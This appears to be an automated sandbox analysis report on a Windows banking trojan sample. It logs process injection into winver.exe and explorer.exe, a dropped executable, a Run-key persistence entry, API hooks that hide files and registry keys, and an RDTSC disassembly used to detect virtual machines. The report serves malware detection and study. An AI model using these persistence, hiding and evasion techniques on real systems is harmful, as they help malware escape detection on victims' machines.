            Source: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exeSection loaded: nss3.dllJump to behavior
            Source: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exeSection loaded: nss3.dllJump to behavior
            Source: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exeSection loaded: nss3.dllJump to behavior
            Source: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exeSection loaded: nss3.dllJump to behavior
            Source: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exeSection loaded: nss3.dllJump to behavior
            Source: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exeSection loaded: nss3.dllJump to behavior
            Source: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exeSection loaded: nss3.dll
            Source: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exeSection loaded: nss3.dll
            Source: java.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE, DEBUG_STRIPPED
            Source: classification engineClassification label: mal100.bank.expl.evad.winEXE@10/12@14/3
            Source: C:\Users\user\Desktop\java.exeCode function: 0_2_02260005 ExitProcess,GetProcAddress,IsWow64Process,GetModuleHandleW,GetStartupInfoA,ReadFile,WriteFile,SetFilePointer,CloseHandle,CreateToolhelp32Snapshot,Process32Next,OpenProcess,VirtualFree,VirtualAllocEx,CreateMutexA,0_2_02260005
            Source: C:\Windows\SysWOW64\winver.exeFile created: C:\Users\user\AppData\Local\Packages\windows_ie_ac_001\AC\F90F00A9Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMutant created: \Sessions\1\BaseNamedObjects\F90F00A9
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7548:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7788:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7292:120:WilError_03
            Source: C:\Windows\explorer.exeFile read: C:\Users\user\Searches\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\java.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: java.exeReversingLabs: Detection: 89%
            Source: unknownProcess created: C:\Users\user\Desktop\java.exe C:\Users\user\Desktop\java.exe
            Source: C:\Users\user\Desktop\java.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\java.exeProcess created: C:\Windows\SysWOW64\winver.exe winver
            Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Roaming\F90F00A9\bin.exe "C:\Users\user\AppData\Roaming\F90F00A9\bin.exe"
            Source: C:\Users\user\AppData\Roaming\F90F00A9\bin.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Roaming\F90F00A9\bin.exe "C:\Users\user\AppData\Roaming\F90F00A9\bin.exe"
            Source: C:\Users\user\AppData\Roaming\F90F00A9\bin.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\java.exeProcess created: C:\Windows\SysWOW64\winver.exe winverJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Roaming\F90F00A9\bin.exe "C:\Users\user\AppData\Roaming\F90F00A9\bin.exe" Jump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Roaming\F90F00A9\bin.exe "C:\Users\user\AppData\Roaming\F90F00A9\bin.exe" Jump to behavior
            Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: java.exeStatic PE information: section name: .imports
            Source: bin.exe.2.drStatic PE information: section name: .imports
            Source: C:\Users\user\Desktop\java.exeCode function: 0_2_02260C1A push edi; ret 0_2_02260C56
            Source: C:\Users\user\Desktop\java.exeCode function: 0_2_02260B89 push edi; ret 0_2_02260C56
            Source: C:\Windows\SysWOW64\winver.exeCode function: 2_2_02F00B65 push edi; ret 2_2_02F00C32
            Source: C:\Windows\SysWOW64\winver.exeCode function: 2_2_02F00BF6 push edi; ret 2_2_02F00C32
            Source: C:\Windows\explorer.exeCode function: 3_2_01380B65 push edi; ret 3_2_01380C32
            Source: C:\Windows\explorer.exeCode function: 3_2_01380BF6 push edi; ret 3_2_01380C32
            Source: C:\Windows\explorer.exeCode function: 3_2_013A0B65 push edi; ret 3_2_013A0C32
            Source: C:\Windows\explorer.exeCode function: 3_2_013A0BF6 push edi; ret 3_2_013A0C32
            Source: C:\Windows\System32\sihost.exeCode function: 4_2_00AC0BF6 push edi; ret 4_2_00AC0C32
            Source: C:\Windows\System32\sihost.exeCode function: 4_2_00AC0B65 push edi; ret 4_2_00AC0C32
            Source: C:\Windows\System32\svchost.exeCode function: 5_2_00910BF6 push edi; ret 5_2_00910C32
            Source: C:\Windows\System32\svchost.exeCode function: 5_2_00910B65 push edi; ret 5_2_00910C32
            Source: C:\Windows\System32\svchost.exeCode function: 6_2_009A0BF6 push edi; ret 6_2_009A0C32
            Source: C:\Windows\System32\svchost.exeCode function: 6_2_009A0B65 push edi; ret 6_2_009A0C32
            Source: C:\Windows\System32\ctfmon.exeCode function: 7_2_00A50BF6 push edi; ret 7_2_00A50C32
            Source: C:\Windows\System32\ctfmon.exeCode function: 7_2_00A50B65 push edi; ret 7_2_00A50C32
            Source: C:\Windows\System32\svchost.exeCode function: 8_2_00D40BF6 push edi; ret 8_2_00D40C32
            Source: C:\Windows\System32\svchost.exeCode function: 8_2_00D40B65 push edi; ret 8_2_00D40C32
            Source: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exeCode function: 9_2_00B50BF6 push edi; ret 9_2_00B50C32
            Source: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exeCode function: 9_2_00B50B65 push edi; ret 9_2_00B50C32
            Source: C:\Windows\System32\RuntimeBroker.exeCode function: 10_2_00110B65 push edi; ret 10_2_00110C32
            Source: C:\Windows\System32\RuntimeBroker.exeCode function: 10_2_00110BF6 push edi; ret 10_2_00110C32
            Source: C:\Users\user\AppData\Roaming\F90F00A9\bin.exeCode function: 12_2_001C0B65 push edi; ret 12_2_001C0C32
            Source: C:\Users\user\AppData\Roaming\F90F00A9\bin.exeCode function: 12_2_001C0BF6 push edi; ret 12_2_001C0C32
            Source: C:\Users\user\AppData\Roaming\F90F00A9\bin.exeCode function: 12_2_02380C1A push edi; ret 12_2_02380C56
            Source: C:\Users\user\AppData\Roaming\F90F00A9\bin.exeCode function: 12_2_02381A92 push esi; ret 12_2_02381A94
            Source: C:\Users\user\AppData\Roaming\F90F00A9\bin.exeCode function: 12_2_02381B61 push esi; ret 12_2_02381B63
            Source: C:\Users\user\AppData\Roaming\F90F00A9\bin.exeCode function: 12_2_02380B89 push edi; ret 12_2_02380C56
            Source: C:\Windows\System32\RuntimeBroker.exeCode function: 15_2_00AB0BF6 push edi; ret 15_2_00AB0C32
            Source: C:\Windows\System32\RuntimeBroker.exeCode function: 15_2_00AB0B65 push edi; ret 15_2_00AB0C32
            Source: C:\Windows\System32\smartscreen.exeCode function: 16_2_00290B65 push edi; ret 16_2_00290C32
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: C:\Windows\SysWOW64\winver.exeFile created: C:\Users\user\AppData\Roaming\F90F00A9\bin.exeJump to dropped file

            Boot Survival

            barindex
            Creates autostart registry keys with suspicious names
            Source: C:\Windows\SysWOW64\winver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run F90F00A9Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run F90F00A9Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run F90F00A9Jump to behavior

            Hooking and other Techniques for Hiding and Protection

            barindex
            Hooks files or directories query functions (used to hide files and directories)
            Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile
            Hooks registry keys query functions (used to hide registry keys)
            Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey
            Modifies the prolog of user mode functions (user mode inline hooks)
            Source: explorer.exeUser mode code has changed: module: ntdll.dll function: ZwResumeThread new code: 0xE9 0x9E 0xE1 0x12 0x25 0x51
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Tries to detect virtualization through RDTSC time measurements
            Source: C:\Windows\SysWOW64\winver.exeRDTSC instruction interceptor: First address: 0000000002F02FAD second address: 0000000002F02FD6 instructions: 0x00000000 rdtsc 0x00000002 mov eax, edx 0x00000004 stosd 0x00000005 mov eax, dword ptr [ebx+004042B5h] 0x0000000b stosd 0x0000000c mov eax, dword ptr [ebx+004042B9h] 0x00000012 stosd 0x00000013 mov eax, dword ptr [ebx+00406820h] 0x00000019 stosd 0x0000001a mov eax, dword ptr [ebx+00406824h] 0x00000020 stosd 0x00000021 lea eax, dword ptr [ebp-00000700h] 0x00000027 sub edi, eax 0x00000029 rdtsc
            Source: C:\Users\user\Desktop\java.exeCode function: 0_2_02260005 rdtsc 0_2_02260005
            Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 733Jump to behavior
            Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 712Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_2-3165
            Source: C:\Windows\SysWOW64\winver.exe TID: 7412Thread sleep count: 271 > 30Jump to behavior
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\winver.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\winver.exeLast function: Thread delayed
            Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
            Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
            Source: C:\Windows\System32\ctfmon.exeLast function: Thread delayed
            Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
            Source: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exeLast function: Thread delayed
            Source: C:\Windows\System32\RuntimeBroker.exeLast function: Thread delayed
            Source: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\RuntimeBroker.exeLast function: Thread delayed
            Source: C:\Windows\System32\smartscreen.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exeLast function: Thread delayed
            Source: C:\Windows\System32\RuntimeBroker.exeLast function: Thread delayed
            Source: C:\Windows\System32\RuntimeBroker.exeLast function: Thread delayed
            Source: C:\Windows\System32\ApplicationFrameHost.exeLast function: Thread delayed
            Source: C:\Windows\System32\RuntimeBroker.exeLast function: Thread delayed
            Source: C:\Windows\System32\oobe\UserOOBEBroker.exeLast function: Thread delayed
            Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
            Source: C:\Windows\System32\dllhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\RuntimeBroker.exeLast function: Thread delayed
            Source: C:\Windows\System32\RuntimeBroker.exeLast function: Thread delayed
            Source: explorer.exe, 00000003.00000000.1638532845.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
            Source: SearchApp.exe, 0000000B.00000003.1812374144.0000024B5CBD5000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vmware horizon client
            Source: SearchApp.exe, 0000000B.00000000.1760446370.0000024B42264000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: com.nicehash.nhm1251102507VMware.View.Client
            Source: SearchApp.exe, 0000000B.00000000.1823735672.0000024B55C00000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: *|vmware workstation 15 player*|vmplayer6438
            Source: explorer.exe, 00000003.00000002.2901515644.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
            Source: explorer.exe, 00000003.00000002.2975916744.00000000079FB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: SearchApp.exe, 0000000B.00000003.1812027096.0000024B5A502000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000B.00000000.1823735672.0000024B55C00000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: *|*|qemu10642
            Source: svchost.exe, 00000005.00000002.2912066830.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @os=windows; osVer=10.0.19045.2006; lcid=en-GB; deviceType=9; deviceModel=VMware, Inc./VMware20,1;I!
            Source: explorer.exe, 00000003.00000002.3032615601.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1637966604.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1637966604.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3032615601.000000000982D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000000.1717426003.0000019E29F00000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.2940071655.0000019E29F00000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: SearchApp.exe, 0000000B.00000003.1812374144.0000024B5CBD5000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vmware workstation 12 player
            Source: SearchApp.exe, 0000000B.00000000.1747233145.00000243400AB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: https://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
            Source: svchost.exe, 00000005.00000002.2912066830.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @os=windows; osVer=10.0.19045.2006; lcid=en-GB; deviceType=9; deviceModel=VMware, Inc./VMware20,1;nlse]
            Source: SearchApp.exe, 0000000B.00000003.1812027096.0000024B5A502000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000B.00000000.1823735672.0000024B55C00000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: *|hyper-v manager*|hyperv4178
            Source: explorer.exe, 00000003.00000002.3041105385.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
            Source: SearchApp.exe, 0000000B.00000000.1766890934.0000024B44184000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000B.00000000.1765512807.0000024B42D43000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000B.00000000.1757604184.0000024B41F45000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: var fbpkgiid = fbpkgiid || {}; fbpkgiid.page = '';;(function(BingAtWork) { if (typeof (bfbWsbTel) !== "undefined") { BingAtWork.WsbWebTelemetry.init({"cfg":{"e":true,"env":"PROD","t":"33d70a864599496b982a39f036f71122-2064703e-3a9d-4d90-8362-eec08dffe8e8-7176"},"ig":"892FA07886414BDF8EE1764A59FF39C6","ConversationId":"21139c92-d559-45ad-9d8f-73e2a64bf7e7","LogicalId":"30363daf-0e99-4b56-afae-f0c5eee8522a","tid":"651d53d035ec4c7eba14a4092e8aedb0","sid":"193A581F83766B4319784BBF829B6A16","uid":"","muid":"6666694284484FA1B35CCB433D42E997","puid":null,"isMtr":false,"tn":null,"tnid":null,"msa":false,"mkt":"en-us","b":"edge","eref":"Ref A: 651d53d035ec4c7eba14a4092e8aedb0 Ref B: MWHEEEAP0024F6D Ref C: 2023-10-04T12:00:16Z","vs":{"BAW12":"BFBBCEJIT2","BAW2":"BFBSPRC","BAW5":"PREMSBCUSTVERT","BAW7":"BFBPROWSBINITCF","CLIENT":"WINDOWS","COLUMN":"SINGLE","FEATURE.BFBBCEJIT":"1","FEATURE.BFBBCEJIT2":"1","FEATURE.BFBEDUQWQSCLKWSB":"1","FEATURE.BFBPROWSBINITCF":"1","FEATURE.BFBREFRPLAN":"1","FEATURE.BFBSPRC":"1","FEATURE.BFBWSBRS0830TF":"1","FEATURE.MSAAUTOJOIN":"1","FEATURE.MSBDSBIGLEAM":"1","FEATURE.MSBDSBORGV2":"1","FEATURE.MSBDSBORGV2CO":"1","FEATURE.MSBWDSBI920T1":"1","FEATURE.MSNSBT1":"1","FEATURE.WSBREF-T":"1","MKT":"EN-US","MS":"0","NEWHEADER":"1","THEME":"THBRAND","UILANG":"EN"},"dev":"DESKTOP","os":"WINDOWS","osver":"11","dc":"CoreUX-Prod-MWHE01","canvas":"","sci":true,"isMidgardEnabled":true,"isHomepage":false,"snrVersion":"2023.10.03.39942242"}); } })(BingAtWork || (BingAtWork = {}));;_w.rms.js({'A:rms:answers:BoxModel:Framework':'https:\/\/r.bing.com\/rb\/18\/jnc,nj\/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w'});;
            Source: SearchApp.exe, 0000000B.00000003.1809228860.0000024B5CBDE000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000B.00000003.1812027096.0000024B5A502000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000B.00000003.1812374144.0000024B5CBDE000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000B.00000000.1823735672.0000024B55C00000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: *|hyper-v manager*|virtual5441
            Source: SearchApp.exe, 0000000B.00000000.1760446370.0000024B42264000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware.View.Client
            Source: SearchApp.exe, 0000000B.00000003.1812374144.0000024B5CBD5000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vmware workstation 15 player
            Source: winver.exe, 00000002.00000002.2901295181.0000000002F77000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2910596872.00000151A4A90000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1714440936.00000151A4A90000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: explorer.exe, 00000003.00000000.1636127493.00000000078A0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
            Source: explorer.exe, 00000003.00000000.1637966604.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD00\w
            Source: explorer.exe, 00000003.00000002.2975916744.00000000079FB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}'
            Source: explorer.exe, 00000003.00000000.1638532845.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
            Source: SearchApp.exe, 0000000B.00000000.1823735672.0000024B55C00000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: *|vmware horizon client*|vm ware8394
            Source: explorer.exe, 00000003.00000002.3041105385.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
            Source: SearchApp.exe, 0000000B.00000000.1823735672.0000024B55C00000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: *|vmware vsphere client*|vspe6388
            Source: SearchApp.exe, 0000000B.00000003.1812374144.0000024B5CBD5000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vmware vsphere client
            Source: explorer.exe, 00000003.00000002.2975916744.00000000078AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTTAVMWare
            Source: SearchApp.exe, 0000000B.00000000.1823735672.0000024B55C00000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: *|vmware horizon client*|vdi3894
            Source: SearchApp.exe, 0000000B.00000003.1809228860.0000024B5CBDE000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000B.00000003.1812027096.0000024B5A502000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000B.00000003.1812374144.0000024B5CBDE000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000B.00000000.1823735672.0000024B55C00000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: *|hyper-v manager*|hyper v4919
            Source: explorer.exe, 00000003.00000000.1637966604.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
            Source: SearchApp.exe, 0000000B.00000003.1812374144.0000024B5CBD5000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: visual studio code - insidersvmware horizon clientnsidersscode
            Source: SearchApp.exe, 0000000B.00000000.1823735672.0000024B55C00000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: *|vmware horizon client*|view5503
            Source: svchost.exe, 00000005.00000002.2912066830.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @os=windows; osVer=10.0.19045.2006; lcid=en-GB; deviceType=9; deviceModel=VMware, Inc./VMware20,1;
            Source: SearchApp.exe, 0000000B.00000003.1809228860.0000024B5CBDE000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000B.00000003.1812374144.0000024B5CBDE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: *|chrome655*|google chrome*|google chrme12854*|hourly analysis program 4.50*|hap1*|google chrome*|gogole chrome12596*|google chrome*|gogle chrome12063*|google chrome*|googe chrome13035*|google chrome*|open google chrome12094*|google chrome*|google chome13148*|google chrome*|goole chrome12691*|google chrome*|google.com6973*|google chrome*|goggle chrome11902*|google chrome*|google chroem12365*|hourly analysis program 4.91*|hap1*|hourly analysis program 5.10*|hap1*|hp scan and capture*|hpscan6530*|hp unified functional testing*|uft1*|ibm integration toolkit 10.0.0.7*|iib403*|hp support assistant*|hps5179*|huawei operation & maintenance system*|lmt1*|ibm integration toolkit 10.0.0.10*|iib1*|hourly analysis program 5.11*|hap114*|ibm integration toolkit 10.0.0.12*|iib1*|hyper-v manager*|hyper v4919*|ibm integration toolkit 10.0.0.15*|iib1*|hourly analysis program 4.90*|hap375*|ibm notes (basic)*|lotus3079*|ibm integration toolkit 10.0.0.11*|iib1*|hourly analysis program 5.01*|hap1*|ic business manager*|icb1577*|idle (python 3.7 64-bit)*|idel5996*|income tax planner workstation*|bna1*|idle (python 3.7 32-bit)*|idel6028*|hpe content manager*|trim1743*|image composite editor*|ice852*|instrument de decupare*|snipp3115*|idle (python gui)*|python idle5336*|import passwords*|lastpass1242*|hourly analysis program 4.80*|hap1*|hyper-v manager*|virtual5441*|i.r.i.s. ocr registration*|iris1117*|hp support assistant*|hp ass4184*|hpe unified functional testing*|uft1*|ibm integration toolkit 10.0.0.13*|iib1*|hpe records manager*|trim1399*|internet download manager*|imd6996*|internet explorer*|internet exploreer11386*|internet explorer*|internet expolorer12620*|internet explorer*|enternet explorer12262*|internet download manager*|ine9116*|internet explorer*|interner explorer12898*|integrated operations system*|ios1*|internet download manager*|don8066*|internet explorer*|microsoft explorer11072*|internet explorer*|interent explorer12236*|internet explorer*|inernet explorer12324*|internet download manager*|idman7834*|integrated architecture builder*|iab1*|internet download manager*|idmm8541*|internet explorer*|internet exploerer12012*|internet explorer*|internet explorere10177*|integrated dealer systems - g2*|ids1249*|internet download accelerator*|ida842*|internet download manager*|
            Source: SearchApp.exe, 0000000B.00000000.1766426485.0000024B4402B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: ?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
            Source: explorer.exe, 00000003.00000000.1636127493.0000000007A34000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.0000000007A34000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBnx
            Source: SearchApp.exe, 0000000B.00000000.1823735672.0000024B55C00000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: *|vmware workstation 12 player*|vmpl5459
            Source: SearchApp.exe, 0000000B.00000003.1812374144.0000024B5CBD5000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vmware workstation 15 playerrecord sound:wux:record soundebi
            Source: SearchApp.exe, 0000000B.00000000.1823735672.0000024B55C00000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: *|*|vmware6886
            Source: SearchApp.exe, 0000000B.00000003.1812027096.0000024B5A502000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000B.00000000.1823735672.0000024B55C00000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: *|hyper-v manager*|vm4595
            Source: SearchApp.exe, 0000000B.00000000.1823735672.0000024B55C00000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: *|vmware vsphere client*|vcenter5038
            Source: explorer.exe, 00000003.00000002.2901515644.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
